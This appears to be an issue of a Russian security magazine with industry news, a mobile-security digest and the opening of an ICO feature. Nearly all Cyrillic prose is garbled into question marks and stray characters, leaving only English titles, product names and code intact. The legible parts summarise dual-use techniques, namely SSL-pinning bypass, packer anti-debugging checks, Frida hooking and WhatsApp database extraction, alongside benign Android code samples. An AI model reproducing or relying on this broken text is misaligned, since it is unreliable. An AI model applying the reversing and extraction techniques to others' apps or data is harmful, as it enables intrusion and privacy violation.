????��??�????�??�???�???�??�??燙MS.
????�,1%�???�?????�??�??�?????�????
???�?????�????��???�?�???�??�??
???�????�??�??�???�??�??�????�???�?????�?�??�?????�?燙yberEdge燝roup.
?
???�????燙yberEdge燝roup�???�???�???�??�???�??�????� 1200�? ????��?????�???�??
?��???�??�???,�??�?�?????,�??�???????�??�??�?????��??�??,�???�?�??�?�??�???
???�?????�???.
???�?????,�??�?�???�?????�????�??�??�???�????� 55%�???�??�??��,3%�?�??�????�
??????�??�???�??�???�????�??�????.�??�??�?????�??�?�??�??�?????��??�?�??�???
53,3%�???�??�????.
???�?????� ????�????�??� ??????� 38,7%� ???�????,� ??� ????�?� ????� ????�?� ??????�?� ??� ???
(19,1%)� ?� ???�?� ??????�?� ??� ???�???�??� ???�???� ???�??�??�?� ???� ???�?????�?� ???�??.
???????�??�,6%�???????�??????�??�?��????,��??????�??.
?????�?????營CO
????�??????�??� ????�??� LoopX,� ???�??�??� ????�?????�??� ???�???????
??????�??� ???�???�??� ???� ???�????� ????�?????�??� ??� ????� ????�???�???
???�???�???� ????�?????�???� ????�??�?,� ???�??�?� ????�??�??.� ???�?????�
????� LoopX� ???????� ?� ????�??�???� ???�????�??,� ?� ???� ????�???� ???�???
?� ????�??�??� ?????,� ????�??� Facebook,� Telegram� ?� YouTube,� ????� ???�???.
???�????� ????????� ???�??� ???�????�???� ???�?,� ???�??� ?????� ???????�??
????�??�??�???,�??????�??�??�???�???�?�??�??????�??�??�????.
????�?????�?� Reddit� ???�??�????�?,� ???� ???�??� ???�????� ????�?� ??????�
??????�?.� ???� ????�?????,� ?� ?????�?� ???�????�????� ?� ?????� �???�??????�
???�???�??�?粻??�???�????�??�???�????�?�?????,�營CO�??�?�??�???�?
????�??�????�????�???.�?,��?????�??,�??�????�???�???????��??�?
???�??�????�??.
ICO� ???�???� ????�?????� ???� ?� ????�?� 2018� ????,� ??� ?????�?� LoopX
???????,�??�??�?�??�?�??????�??�6,21燘itcoin�(BTC)��46,70燛thereum
(ETH).� ??� ????� ??� ???�???� ???????� LoopX� Coin� (LPX)� ?????�???� ??????�???
???�?�5�??�????�??�????.
???�??�?� ???�??�?,� ???� ??� ??????� ??� ????�??�?� ????� ????�?????�??
????�????�???�???�???�??�???�?,��??????�??�????�???��??�??�???�
????�??�???�??????�??�????牜???�???�.
??�?�?�???�???�?�???�?????�??,�???�??????�??�?燫eddit,��???????�
???�??�??�?????�?�?????燘itcoinTalk,�?????�??�??�??�??�??�??�????�
??????� ?� ???�???�???????�??� ????�?,� ?� ???�?� ????�?????�?� ??????�???
??????��??�??�?????�??�??.
???,� ???� ??????� ??� ???�??� ICO,� ?????�????�??� ?????� ???�??�??� ?????�
???.� ?� ???�???,� ?????�?� ?????� ??� ????�??�??� ???�??�?� ?????�???� ????�??
Prodeum,營CO�?????�?�???�?????��???�?�18�???��??�??�???�?????�
??� ??� ??????�?� ???�?.� ???�??� ???�??� ???�??� ???�???�?� ?????� ???�????
????�?� ???�?????�??�??� ???�?� ???�?????� ?� ????� ?????� (????�??,� ??� ????�
???� ICOWatchlist,� ?????�???� ???� ??� ????� ?????� ???????� ?� ??????�?� ????�
??�0�????�??�????).��??�?�??,�??�??�????�?�??�????�?�???牜????�
????�????�?� ????�???????�???�,� ????�???� ????� ???�??� ?????� ????�???
?�??????????�???�??�??�??:爌enis.
?��???�???�???�??�??�??,�?�?�?????�?�????�???.�??�?�????�?��???��????�?,
???�??�??�???�??�??�??�??�??,��????�???�?�???�??�??�??.�??�??�???�?!�??�??????�
??????�????�??????�??�??�??�??�??�?,�??�??�??�???�????�??�????�????�
?�???�??�??�??�??�??��???????燭he燛conomic燭imes,�??�?�?�???�???�????�???�????
?????????營PHONE
?????�?燝ITHUB
??�??�??�??�???�??????�?燝itHub�???????�???�??�????�?爄Boot,�????
??� ???�????� ???�????�???� ??????�??� Apple,� ???????� ????�???� ??� ???�???
???????�??�??�????�?.�??�????�?�???�?爄Boot�???�???�????�?�??�??
???�?�???�????�?????�???�(????�?�???�???�???�?燘oot燫OM),�?�??????
?� ??????�???�?� ????,� ???�????,� ???�?� ??� ???� ????�??????� ???�???� Apple,
?� ?????� ??????�?� ???� ???????�??� ???� ?????�???�?� ??????� ?� ?????� ???�???�
???�????.
???� ???� ???�??????�??� ???�??� ????????� ?????� ?� ?????�?,� ???�???
?� ???????�????� iBoot� ??????�?� ?� ????�??�?????.� ???� ???�??�??� ????????
?????�???,�??�??????�?�???�??�?��?????爄OS�3.x,�?�???�??,�??�????�
???� ?????� ????,� ???�??� ???�?,� ??????�???�?� ?� ?� iOS� 11.� ????�??�???� ?????,
???�???�?????�???�??�?�??�??�????�????�?????�??�??,�?�???�????
??????�?????�??� ?� ????�???�??� ???�???� iBoot� ??� ????�??� ???�????�??.
????�??,�????�??�??�??爄OS???????�???�??�??�????�?????�?�???????
Secure燛nclave.
???�?�??�???,�??�??�????燗pple��????�??�???�?�???????�???�??�?
???�??�??��???�??�????�??,��???????�??爄Boot�??�????�???�???�???�
?????� ?� ???�???�?� ???�???�???.� ???,� ????� ?????� ????�??� ???�???� ??� ????�
?????�??,� ???�????� bug� bounty� ????�????� Apple� (200� ?????� ???�????)� ????�
???�????�?�???�?�?�???�???�??�??�????�??��??�??�?�?????�??�???�
?????.
?� ???�?� ????�?� ???�?� ????� ??????�????� ?� ???????�?� ??????� iBoot� ???
???�??� ?� GitHub� ??� ???�???�??� Apple.� ????�??�???�?� ???�????� ???�????�?
??????� ??????� ?� ??????�??� DMCA� (Digital� Millennium� Copyright� Act,� �????
??� ?????�???� ???�?� ?� ???�????� ???�?�),� ???�?� ????� ????�??�??�??� GitHub
???�?????�??�???�???�??�??�???.�???�??�?,�??�????�???�??�???�???�
????�?燗pple�??�????�??�???�???�??????�????�??�??�???�?.�
??�??� ????�??�???�?� Apple� ???�????�?� ???�??�????�???�?� ????�???
?�??�?????�???�????�???�?????�??:
�???� ??� ???�?,� ????�?� ???�?????� ???�??� ????????� ????� ????�?????
???�????,�?�????�???�??????�????�????�??�??�??�?????,�??�??
??� ??????�???� ??� ???�???????� ???????�?� ????.� ?� ?????� ??????�?
?????�???�?� ???�??�??� ????�??�??� ?� ????�??�???� ???�?� ???????-�
?????,��?�???�?�??�???�?�????�???�?????�??�????????�?�?
?????�??� ???�??� ?� ??????�?????� ???�??�??�??� ?????� ????�??�??
???????�?????�.
50�0�0�???????�??�?????�??�??�????
LET'S ENCRYPT
????�???�?� ?????�?????�???� ????�?????�??�?� ???�??� Let?s� Encrypt� ???�????�???� ?????
???�?????�?.
???�???�??�??�?????�?,�???????�??????�????�????�???�???,�???�?????�??�????
50�????????�??��?????�???�???�?�????�?��????????�??????.
???�????� ???�??�???� NetTrack,� ?� ???�?????� ???�?� ???�?????�?� Let?s� Encrypt� ??????�???�?
??� 42,6%� ????� HTTPS????�??� ?� ???????�?.� ???�?� ????�???,� ???� ???� ???� ??????� ?????� ????
??????�???�??�?????�%.
??�??�??�??�???燜irefox燭elemetry,�????�???�??�????�???�??�?燞TTPS��??�?????�???�
??�??�???�?�,6%.
HEADER
?????????
????????
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
????????????�????????
???燝PS,�????�?????????
QIHOO��??????????
??????????��???????
??�??�?� ?� ?????�?:� ?????�???�??� ????�??�?� ?� ???�?????�
???燝PS,�????�???�?????�?�??�??�???燪ihoo,�??�??�???�
?????� ????�??� ???????�?� ?� ???�??�??� ????�????� What?
sApp,�?????�????�??�???�??��??�??�?.��??�?:�?????
??�?????�??????�??�??????��??�?�??�???�???,�????
???�????�?� Android� KTX,� ???�???� ???�????�????� ????�???�
???,� ????� ?� ??????� ?,� ?????�?� ??,� ???�????� ???�??� ????�
??????.
???????????
? StaCoAn� ?� ???�??�???� ???� ????�???�???�??�???� ???�????�???� ???�???
???�???�??�??燗ndroid?�???�????�??�??�??燗PI????�?,燗PI???????�??,
???�?�??�??????��???�??
? Quiet��?�????,�?�???�?�???�??�??�??�????�?�??�?????�?�??�??
(???�????燭CP)��??????�??�??
? Electra�爅ailbreak�??爄OS�.0?11.1.2?
? LibScout��??�??�???�??�???�?�??�????�??�??�??�?????��??�????�
???�(?????�???????��??????�????�??�????).
????????
??�??�???�??�???�??�?��??�????�??燝PS
PinMe: Tracking a Smartphone User around the World ?� ?????�???�??,� ????�
?????�??� ?????�???�??� ??????�????� ????�??�?� (?� ???� ???�???�?)
???�?????�??????燝PS,�????�????�?�??????�???�???��??�??�??�???
Wi?Fi.� ????�?� ???�?� ?????�???�???� ??� ?????�???� ????�????� ????�??�??�???
?� ????�??�???� ??????�?????� ????�???�???,� ?????�??,� ????????� ?� ???�??,
???????�??�?????�????�???�??�???�?????�????��??�?????燝PS.
????�?????��??�?????.�?�???�???�???�??�???�???�??�???�??燩in?
Me.� ?� ??????� ?????�?� ???� ??????�?� ???????�??� ?� ???�?????� IP?????�?
????�??�?� ?� ?????� ????�??� ????�???�?� ???� ????�???????�??� ???�??????�
?????.� ?????� ??????�???� ????� ???????�??� ?� ???�????,� ???????� ???�???�?
????�?????�??�????�??�????,�???�???�????�???�????��?????�??�????�
???� ????.� ???� ???????�??� ??????�???�?� ???� ????�???�??� ???�???� ??????�
???????� (????�?,� ????�?????,� ?????�???�??� ????�????,� ???????)
?�??????�??�?????.�??�??�??�?????�?????�???�?�??�???�???�??�???�
????� ???�?????�????� ??� ???�?????� ????�????,� ?????� ???� ??????,� ????�
???????�??�??��??�??�??�??.
??�???�??� ???�??�?� ????�?� ???�??�?????.� ?????�???�????� ???�???
??????�?�??�????,�????�??????�燝PS.�???�?�???��???�???�??:燩inMe
??� ?????� ????????� ?� ????� ?� ???�??� ???�??,� ???� ???� ?????,� ??� ???�?� ??????�?
?�???�??�??????�??�??�???�?��??????�?????�???�???�(???�????,�???�
??????��??�???�????�?�??�???).�??�?燩inMe�?�??�???�?,�???�?�????�
???�?� ????�???�??� Tor????�???� (IP??????� ??????�??� ???�?� ?????� ???�??????�
???).
???�??�???�??�??�???,�??�??�????��?????�?????�?燝PS,�??�??
?�??????��??�?????燩inMe
???�???�??�????�??
A Virgil's Guide to Pentest: Operation Android ?� ????�?� ???�????� ???� ???????�
????.�?????�?????�?�??�????�?????�?,�?�?�??�??�?�????�?�??�??
????�??�??�???.�??�????:
? ???� ????�??� ???�??�??�?� ?� jadx?gui� (?????�??????)� ?� apktool� (???�???�?
?????�???燗PK��??�???�??�??????)?
? ??�??�???�??�??�??�???�?燬SL爌inning�燗ndroid?SSL?TrustKiller?
? ??�??�???�??�??�??�???�???�???�??�???�???�?�??�????�??�� Droz?
er?
? ???�????� ro.build.version.release,� ro.product.model� ?� ro.
product.brand� ?� ???�???�?� ???�?� ????�???.� ??????�??� ???�???�??
??????�???�?�??�???�?????�??�??�???�???�??�??
? ??�?� ?� ???�???�?� ????� root????�??� ?� ???�???�??� ????�???�???� ????????,
????�?� ????�??�??� ???�?� /system/app/SuperUser.apk� (SuperSU.
apk)��/system/bin/su.
???�??�??�???�??,�??????�???�??�??�????燪ihoo
Dissecting mobile native code packers. A case study ?� ???�??� ???�???�??,
???????�???� ?� ???????� ???�??�???� Qihoo.� ?� ??????� ???�???�?� ????????
???????�??�??????,�???�????�?�?�?????�??�?�??.
1.燚EX?????� ???�???�??� ?????� ????�?� ???????� ????????,� ????�?� ???� ???
???�???� ???�????�?� ????,� ???� ???� ????�?� ???� ?????�?� ????:� ???,� ???� ??
????�?,��??�?????�?�??????�??�????�??�??�????�?.�??�??�???�??
??????,� ???� ????�??� ?????� ???�?� ??????�?� ???????�??� ?� ???� ?????
?????�????�??�???�???.
2.�??�????�??� ?????�??� ???�????�?� ?????�???� ???�???�?� ???�????� ??� ??,
??�?????�?�?�??�??�??????�??,��????�??�????�???�?��??�???�?
?� ??????� ???�??� ???�????�?.� ???�?� ???�????� ??� ???�???�???� ???????�?,
???�????�?� ???�?� ??????�???� ???�??� ?????� ??????� ?� ???�????�??
??????,�??????�??????�?�???????�???�?�????�???�???燗RM.
3.�??�??� ?????�??� ???�????�?� ?� ???� ???�?????� DEX????�??.� ??� ?????�???
??� ???�?� ???�?????�???� DEX????�?� ?????�????�??� ????�???,� ????�
?????�???�?� ???,� ???�????�???�?� ???�???� ???� ???????�??,� ?� ?????
??????�?�??�??????�??.
??�???�?????�??�???�?????�?�????�????:
? ???�??� ???�?� /proc/self/status� ?� ???�??�?,� ???� ???�????� TracerPid
???�?�????
? ???�??� ?????�???� ???�?� ???�???� (/system/bin/linker)� ?� ???�??�?
???�???� ???�?� ???�???� rtld_db_activity� (????� ????????� ??� ???�???�
???��??�??�???�????�??�??�??�?????)?
? ??�???�???�??�?� /proc/PID/cmdline�???�??�??�??�(?�??????�???
???�??)� ?� ????�??� ????�????�??� ?????� (android_server,� gdb,� gdbserver
?�??�??)?
? ???�??�?� ???�?� /proc/net/tcp� ??� ?????�????� ????�?� 00000000:
23946�(???�???�???,�??��?????�???�??�??�??營DA)?
? ??�???�???� ???�??� /proc/self/mem� ?� /proc/self/pagemap,� ???�?
??????,�??�??????�??�??�??�???�??�?�??�???�?�?.
???�??�??�????�???�??�??????�?燱hatsApp
WhatsApp Forensics: Decryption of Encrypted Databases and Extraction of Deleted Messages on Non-Rooted Android Devices��???�??,�?��???�????�??
????�??�??� ??????� ?� ???,� ???� ???????� ????�??� ???????�?� WhatsApp� ??� An?
droid?????�??�?.�??�???????�?????:
1.�??�???� ?????� ???????�?� ?� ???????� ??????� WhatsApp.� ?????� ?????
?????�????,��???�?�?�??�??�???�?,�??�??????�???,�???�??�???
?????�???�??�?????�??�???�??�???�???�??�???�??�?�?????.
2.�?�?????� ???�?� root� ?� ???�???�???� ????� ???�??� WhatsApp� ??� ???�??�???
??????�?� (????� msgstore.db).� ???� ??� ?????�?????,� ?????�?� ??� ???�?
????�??????��??????�?????燬QLite???????.
3.�??�???�????�????�??�?燗ndroid.�?????�??�??�???�???�?�????�???
?� ????� ????�??�?� ???�???� ??????,� ?� ???�??� ??� ???� ????� ??� ???????�?
?� ???,� ???�?� ???� ?????�?????.� ??� ???�???� ????�??�?� ???�????� Oppo
????�?�???�?�????�??�??�???�??�?????�??�???�??,��????�??�???�
???�???�??�????�???�?�???�??�??燱hatsApp�(????�??爉sgstore.db).
?� ?????�??� ??????� ????�?� ???�??�???�?,� ???� ?� ????� ???�???� ???�?� ???�???�
??????� ???�??�??� ????�????.� ????� ?� ???,� ???� ?????� ???????� ????�????
?� ????� ???�??� WhatsApp� ???�???� ?????� ???� ?� ???� (????� msgstore.db?wal),
?�????�?????�??�� msgstore.db.� ???� ???�????� ????�????� ???� ?????� ????�
????� ??� ????????� ????,� ??� ????�?� ?????� ??????�?� ?� ????,� ????�?� ???� ???�?
???????.
???�??�??�???�????,�??????�??��???
???�??????????�????�??�???�??
Mobile Application Hacking Diary Ep.2 ?� ??????� ?� ???�???�?� ???�??,� ?????�
??????� ??????�??� ???�???�??� Android� ?� iOS,� ??� ???�???� ????�?� ???�????
???????�???爎oot�?�?????�???.�???,�??�??�??�??�???:
1.� ??�??????�???.�????�?????�?�??�???�??��??????燘ytecode燰iewer
(?????� ???????�???� ??????�?????� ????�?� ???� ?????� ???????� ???�?� ????�
????�??� ????�??� ?????�??????� ?� ???�???�?).� ???????� ???�??� ????�??
????,� ?????�??�??�???� ???�???�??� ?� ???????� apktool,� ???????� ???� ??
????�??� ????� ?� ????�???� ???�??�?????� ??� ???�????� (???�????,� true
??爁alse).�?????�?�??????��???�??�???�?.
2.� ??�??????�???�?�???��??????�??????�?.� ???�?????�???� ???�????�
???� ?� ???????� apktool,� ????�???� ???�????� ????� android:debuggable
?燗ndroidManifest.xml�?爐rue,�?????�???�?�??????.�??�??�???�?��???�
????�??��??????�??????�?� AndBug��????�???�???�????�?��????�
???� ???�???� ???� ??????.� ?????� ???�??�???�?� ?� ???�???�??� ?� ???????
jdb,� ???�??� ?????????�?� ??� ???�??� ?????� ?� ????�???� ???�??�?????� ??
???�????.
3.� ??�?????�??�??�???�????�???�?�???��??????燜rida.�??�??�???� Fri?
da� ???�???�?� ?????�???� ????�????�?� ?� ????�???� ????� ???� ?� ?????� ????�
????�??� ??� ????�??�?.� ?� ???�???� ?????� ??????�???� ??????� ???� ????�?
???�???�?????,��????�??�????�??�??�????�?,�??????�??????�???
?????��???�???�??�??�?????�?�??�????.�???�?��???�???�??�???�
????�???�???�?�??�??�?�?????�?????�????�?.��?????�????� Frida
CodeShare�??�?�??�?�??�??�??�??�??????.
???�?????燩roject燭reble
Developer Brings Full Project Treble Compatibility to the Xiaomi Redmi Note 4 ?
?????�??� ??????� ?� ???,� ???� ???�????�???� ?� ???????� XDA� Developers� ???�???
???�???????�???�????燭reble�?燲iaomi燫edmi燦ote�
??�??�?,�??�??�????�?燭reble�???�?????�?�??�?????�???�?????�???
???�?????�????� ???�????�?� Android,� ??????�???�??� ??� ???�??�??� ??????.
???????� ?� ????�??� ???�??� Android� ???�????� ??� ???� ???�?,� ???????� ????�
??????�???� ?� ???�??� ???�????:� vendor� ?� system.� ???�??� ?????�??� ??????�
??????�?�??,�?????�??�?�?????:�???�???��??�????�?燞AL.�??�??�
???�??燗ndroid.�??�?�????�??�??�?�??�???�???��??????�???�????
?�????�?�?�?????�?�???�??�?�??�????.
????� ?????� ?� ???,� ???� ?????� ???�??� ??,� ???????�??� ???�?� Android� 8,
?????�??�?????�??�????�?�爒endor????�????�???�?�??�???�??�??�??,
?????�???�??�??�??�???�??�?????�??�??�??�?�????�???�?�????????�
??� (??� ?????� ????� Google� ????� ?????�???� ????�?� Android� ???� ???�???�?
Generic燬ystem營mage,�?�??�?�??�???�?�????�???�???��??�??�???
Treble,��??�?????�???).�???�???��??,�??�??�???�??�??�????�???燭re?
ble�??�??????�???�?�???�?�?�???�??�?,�???�???�?�?????�???�?燗n?
droid���?�???�?�??????�?????�???,�??????�??�燗ndroid�??��???
?????�???????�??�?�???�??�??�??.
???�????�??燼bhishek987�??�??�??�???�???.�?�??�??????�??�?????�
??� Treble� ??� Xiaomi� Redmi� Note� 4,� ??????�????� ???�??� cust,� ???�??� MIUI
???�??�????�??????�??�?�?????�???,��????�??�??�???爒endor.
???�??�??燭reble�?燲iaomi燫edmi燦ote�????????????
??�???�?�?????�??????�??�??????
Basic Android Encryption Do's and Don'ts��?????��??????�??�???�??????
?� ???,� ???� ????� ?� ???� ??� ????� ??????� ???� ??????�??????� ???�??????� ?� An?
droid.�???�??�????�?:
??� ??????�??� AES� ?� ??????� ECB.� ??� ????�????� Android� (?� Java)
???� ???�??????� ??� ????�??�?� AES� ???�???�?� ?????� ECB.� ????�???
??????� ECB� ?� ???,� ???� ??� ?????� ???�????� ???�?????�?� ?????�????�??
???????�??.�???�?�???�??�???�?????�?????�?????燙BC�燝CM:
// Do this
Cipher.getInstance("AES/GCM/NOPADDING");
// Don't do this (plain "AES" falls back to the default ECB mode)
Cipher.getInstance("AES");
????�?�?????�??�??�??�??營V:
// Do this
SecureRandom secureRandom = new SecureRandom();
byte[] iv = new byte[IV_LENGTH];
secureRandom.nextBytes(iv);
myCipher.init(Cipher.ENCRYPT_MODE, key, new IvParameterSpec(iv));
// Don't do this
myCipher.init(Cipher.ENCRYPT_MODE, key);
byte[] iv = myCipher.getIV();
??�??�??� ???�??� ???�???� ??????� ???�?� ??????�??????.� ??
??????� ??????� ????�???� ???�??,� ?????�????� ????,� ?� ?????�??� ???�????�
????�?�???,�??�?�??????�???�??�????�?�??�????�??�?????:
byte[] decrypt(byte[] dataToDecrypt, byte[] secretKey) {
    // Decrypt the data
    ...
    // Wipe the key
    Arrays.fill(secretKey, (byte) 0);
    return decryptedData;
}
???�????�????�???�??,�???��?????
How to secure your Android application? ?� ??????� ?� ???�???� ??????�???� ????�
????�?��??,�??�?????�?????�??�????�????�???�??,�???��?????��???�
??�??�???�???.�??????�????�????,�??�???�?:
? ??�????�?� ????�??.� ???�???� ???�?????� ???�??,� ???�???�??,� ????�
??????�???�???�???�????�???�?,�?�????�???�????�?�??�?�??�??
?� ??� ???�??� ?????�???� ??� ???�??�??� ???�??.� ????�??�?� ????�??� (?� ????
??????�????�??�?????)�??�??�?�爏ecurity????�????�???�(TTE),�???????
???�??� ?� ??????�?� ?????� ????�?� ??.� ???�????�???� ???�???�??� ????�???
????�?� ???�???� ???�??� ????�??�??� ?� ????????� ?????� (?� ???�???)� ?� ????�
???????�??�????�??????:
val fmanager = FingerprintManagerCompat.from(getApplicationContext())
fmanager.authenticate(cryptoObject, 0, cancellationSignal, authenticationCallback, null)
? ???�????�????�??.�????��??�????�???�??�???:�???�?????�?????
???�????�?� OpenCV,�???�????�??�??�??�???�???????�????�????�???�
?????�?�???�??????�(???�????:�??�?�??�?????),�???�??�???�??????�
??�???�???� Microsoft�� Google.�???�???�??�????�?�???�???��??,�??
???�???燤S�燝oogle�???�??��??�???�??�???�???�??�??�????��???.
? ???�????�????� ??????.� ???� ???�??????:� 1)� Google� Assistant� ???�?
????�?????�?????�?�?�??????���??�??�??�???燗ndroid�0�???�???�
????燭rusted燰oice,�??????�??�?????�??�??�???�???�???�???�???????
3)� Google� ??� ???�??�????�?� ???�??�??� ???�????�????� ???????� API
???�??�????�????�?????.�??�????�?�???�??�???�?�???:�???�??�???�
????燤S.
???�???燗ndroid燢TX
Exploring KTX for Android�(??�????)��??????�??�????��??�????�? Android
KTX,� ???????� 5� ???�???� ????�?????�?� ???�????� Google.� Android� KTX� ?????�
????�???�????�????�??�???��???�??,�??�??�??�????�???�?�????????
???�????�?� ???� Android� ??� Kotlin.� ???� ????� ??????�??� (??� ????� ????�???,
?????�??�??�??)�??�???:
// Modifying preferences
sharedPreferences.edit {
    putBoolean(key, value)
}
// Working with time and dates
val day = DayOfWeek.FRIDAY.asInt()
val (seconds, nanoseconds) = Instant.now()
val (hour, minute, second, nanosecond) = LocalTime.now()
val (years, month, days) = Period.ofDays(2)
// Creating bundles
val bundle = bundleOf("some_key" to 12, "another_key" to 15)
// Working with AtomicFile
val fileBytes = atomicFile.readBytes()
val text = atomicFile.readText(charset = Charset.defaultCharset())
atomicFile.writeBytes(byteArrayOf())
atomicFile.writeText("some string", charset = Charset.defaultCharset())
// SpannableString
val builder = SpannableStringBuilder(urlString)
    .bold { italic { underline { append("hi there") } } }
// Converting a string to a URI
val uri = urlString.toUri()
// Working with Drawable and Bitmap
val bitmap = drawable.toBitmap(width = someWidth, height = someHeight, config = bitMapConfig)
val bitmap = someBitmap.scale(width, height, filter = true)
// Operations on a View object
view.postDelayed(delayInMillis = 200) {
    // some action
}
view.postOnAnimationDelayed(delayInMillis = 200) {
    // some action
}
view.setPadding(16)
val bitmap = view.toBitmap(config = bitmapConfig)
// ViewGroup
viewGroup.forEach { doSomethingWithChild(it) }
val view = viewGroup[0]
??�?????�????�?????�??�????�????
Automate your app screenshots��?????��??,�??�???�???�???�???�??????�
???� �??�??粻 ?????�????� ???� Google� Play� ?� ???????� ???�???� screengrab
?� ?????�?,� ???????� ??????�??� ????�???� ?� ??????�??,� ???�???�???� ?� ???
???�?� ???�??�??� ????�?� ???�?????.� ???� ??????� ???�?� ???�???� ?????,� ?� ???
?????�???�??�????��???�????/?????�????�?????�???:
function start_clean_status_bar {
    # Enable demo mode
    adb shell settings put global sysui_demo_allowed 1
    # Show the time 12:00
    adb shell am broadcast -a com.android.systemui.demo -e command clock -e hhmm 1200
    # Show full mobile and Wi-Fi signal
    adb shell am broadcast -a com.android.systemui.demo -e command network -e mobile show -e level 4 -e datatype false
    adb shell am broadcast -a com.android.systemui.demo -e command network -e wifi show -e level 4 -e fully true
    # Hide all notifications
    adb shell am broadcast -a com.android.systemui.demo -e command notifications -e visible false
    # Show a fully charged battery
    adb shell am broadcast -a com.android.systemui.demo -e command battery -e plugged false -e level 100
}
function stop_clean_status_bar {
    adb shell am broadcast -a com.android.systemui.demo -e command exit
}
???�????�?
? backgroundable?android� ?� ???�??� ???????�??� ????�????�???�??� ???�??
????�??�??� ?� ???????,� ???�???�???� ???????� ??� ???�???�?� (???�?� ?????�
????????�??�???????�??�???�??��??�??�????�????)?
? kotlin?android?examples��??�??�??�??�?????�??�????�???�?燢otlin?
? RichUtilsKt��????�??�??�?�??�??�??�??�?�(?????�????�???,�?????
?�???�?????�??,�??�???,�??????�???�?��??�??�??�??)?
? AwesomeBar��??�????�??�???�??�??燗ctionBar?
? Fluid燬lider��????�???�??�???�??�??�???�???
? Sneaker��??�????�?�??�?????�???�????��??�???�??�?�???�??
? ColorPickerPreference��?????�?????�??�??
? Videoapparat��???�??��?????�??????�??�????�?�??�?????��????�
???�?????
? ScrollingPagerIndicator� ?� ????�????� ???????�???�??� ????�????� ?� ????
??????
? Android?Gold?nger� ?� ????�??� ?� ??????�??????� ???�????�?� ???� ??????�
??????�??�?�???�??�?�???�??
? KFormMaster��???�??�????�?�??�??�????�???�?燢otlin?
? Prefekt��???�??��?????�??????�??�????�?�??�?????燬haredPrefer?
ences�?燢otlin?
? Scripto� ?� ???�????�?� ???� ????�?� ????�???�??� ???�?� Java� ?� JavaScript,
???????�??????�???�???�?燱ebView?
? Light� ?� ???�??�????�??� ?????�????� ????�???� (snackbar)� ?� ???�????????
???�?????�??.
COVERSTORY
?????
???? ???????????
???????????�營CO
?�????????????
?�????�?????????????
??� ???�?????� ???� ??� ????�??????� ???�?
???�???�?�?????�?????�?:�??????�?�???�
???�?� ???�?????� ???,� Bitcoin� ???� ???� ??
????�??� ?� ???� ????�?� ???�???,� ?� ?????
???�???�?� ????�?????� ????� ??� ??� ???�??
????.� ???� ???� ???�????�?????� ??????�??
???�?????�??,�??????�?�??�?,�??�?????
???�?????�?????,��????�???��??�???�?
?????�????,� ???????� ???�?????� ???�???
???�????� ??????� ????� ???????�??.� ???�?
???�?�??�?�??????�???�??�?????�?????�
??� ?????�??� ????�??�??� ?� ???� Initial� Coin
O?ering,�??營CO.
?????�?????
????.�??????????????�
https://foster.ga
colin.patrick.foster@gmail.com
ICO??????
??�?� ??� ????�??� �??�?� ?� ??????????�,� ??� ???�???,� ???� ?� ????????� ??????,
???�?� ???�???� ???�???�?� ???�?,� ?????� ??� ???�??� ?� ??????�??� ???????�
??????�????�?�??�??�??�????�?營PO.�???�?????�??�???�???�???�??
???�????� ?� ???�?????� ????� (??� ????� ??� ???�?)� ?� ?� ????�??????� ???????.
???�?�??�???�??營PO�??????�?�?????�?�????,�??�?????�??�?????�???
???�???,��??�????�??�???�???�??�???�?�??�?��??�???�?�??????????�
????.��???�??????�??�???�??�?營PO�????營CO.
???�????�??� ????�???� ?????� ???�???�?� ?� ???�?� ???�?????� ???�??,
??????�?� ??� ???�???????�??,� ????????� ?� ????� ??� ???�?� ??� ???�???????�?
???�?�??�???�?�??�??�????��????�???�???�?????.�?�???,�?????�???
???�????????�?�???�??�?.
??�?????�???� ?????� ?????????�????� (???�????,� ??� Solidity� ?� ???�?� ????�
????�??� Ethereum),� ?� ????�???�???� ?� ???????� ???????�?� ??????�?� ??????
?� ?????� ??� ????� ????�?.� ????� ??????� ???� ????� ??� ???????� ??� ????�??�?,
??� ???????� ??� ???????.� ?� ????�????�??� ???�?� ???????�?� ???�??� ???�???
??????�?�??�????�??�??�??,�??�??�???�??�????.�??�???�??�??�????
???�???�??.
INFO
???�??� ???�??????�???� Ethereum???????� ?
???� ???�????� ?????�??,� ???????� ???�???�?
??????� ????�??�?� Ethereum.� ???� ???�???�?� ????�
???�???� Ethereum,� ???????� ?????� ??� ETH
(�???�)� ?� ???�?????�??� ??????� Ethereum,
???????� ????�?????� ???� ??????� ?????????�????�
???.�????�??�?�??�?�??�???�?????�???�???�
???燘itShares,燘itcoin,燫ipple,燦EM��??�??.
???�???�?� ??????,� ?????�???� ????� �???� ???粻 ?� ??????� ???�??� ??� ????�??
??� ???�????�??� ???�??.� ????�??????,� ???�???� ??� ???�??� ???�????� ??� ????�
???????,��??�??�??�??�???�?????��??�??�??�??�??�????�??�?????�
???� ???� ??� ????�?� ???�??� ????????� ??????�?� ???????�?????� ???�???.� ???�?
?????� ???� ?????� ???�??� ?????:� ???�???� ??????� ???,� ???�????,� ????�???� ??
?� ???�??�?.� ????� ????� ????�??� ??� ????�??�?� ?????� ???�?????�?� ??� ???�?
�????�??�??�?�,�?�???�?�??�?????�????�??�?????�?�???�?�?????.
???,� ???� ????�?� ??� ????�?.� ?� ?????�??� ????� ICO� ?� ???� ??????
??� ???????�?????� ????�?� ?� ???�????� ??????�??� ?� ???????.� ???�???� ???
??????�????� ?� ???�???????� ?� ????� ????�??????� ???� ???� ??� (?� ??� ?� ?????)
???�??.�??�????�????�????????�??�?�??�?營CO,�??�??�????�?�????�???
???�?�(???�??�?????�?�??�???��???�???�??�??),�??�?????�??�???�????�
????� ?� ????�??� ???�?,� ???�??�?� ???�???�?� ???� ???�???�?� ???�???� ????�??
(???� ???�???� ?� ????� ????�??�??),� ???�?????�?� ?????� ???�????� ???� ??� ???,
???� ???�?????�?????� ?� �????� ??????�� ???????,� ????�?� ??� ????�???,
??????�??牜??�???�?�,�??�?�?????�?�???�???�??�???�?.
???� ??� ?????,� ???�????� ???�???� Forbes,� ?� ????�??� ????� ?� ???�??� ICO
????� ???�???� ?????� 2,3� ???�???�?� ???�????.� ???�??�?� ?� ???�????�?� ????�
?????� ???�??� ????,� ?� ?????�?� ???�????� �??????� ???�????�??粻 ????�????�
????� ?� ???�??????,� ???????� ????�?� ????� ???� ??????�?,� ???�??�?� ??� ????�
????�?� ????�???�????�??.� ????????� ???????�??� ???�?,� ????�??� ?� ICO� ????�
????�??�??�??�?�????�??�??�??�?????�??�??�????���????�??�????�
???� ???�???� ???�??� ?????� ????� ????�??????� ?????�???� ???�?????
